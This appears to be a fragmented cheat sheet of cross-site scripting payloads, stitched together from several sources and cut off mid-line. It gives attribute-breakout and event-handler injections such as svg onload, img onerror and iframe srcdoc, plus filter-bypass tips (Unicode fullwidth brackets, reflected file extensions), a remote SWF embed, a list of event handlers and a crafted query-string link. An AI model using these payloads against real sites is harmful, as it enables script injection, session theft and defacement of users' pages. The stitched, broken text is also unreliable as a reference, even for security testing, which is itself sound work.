<var/onmouseover="prompt(1)">On Mouse Over</var> "><img src=k.png onerror=alert(/1/.source) /> “><svg/onload=confirm(1)// "><h1>xss</h1>! <
<iframe srcdoc="<svg onload=alert(4);>"> Other obfuscation tricks. In this case the HTML encoding and Unicode encoding tricks from the previous section are also valid, because you are inside an attribute.
Name: '"><svg/onload=confirm(/OPENBUGBOUNTY/)>.
<svg onload=alert(1)//. Bypass inequality symbols. Unicode characters U+FF1C and U+FF1E.
<embed code="http://businessinfo.co.uk/labs/xss/xss.swf" allowscriptaccess=always> <svg contentScriptType=text/vbs><script>MsgBox+1.
Use the <svg onload=alert(1)> payload as a file extension when the extension is reflected in the HTML. Sometimes developers validate the filename and forget to validate the extension.
...onFinish onFocus onFocusIn onFocusOut onHashChange onHelp onInput onKeyDown onKeyPress onKeyUp onLayoutComplete onLoad onLoseCapture onMediaComplete onMediaError onMessage onMouseDown onMouseEnter onMouseLeave onMouseMove onMouseOut onMouseOver.
Here is a query link: site.com?q=%27>"<svg/onload=confirm(%27testing-xss1%27)>&s=%27>"<svg/onload=confirm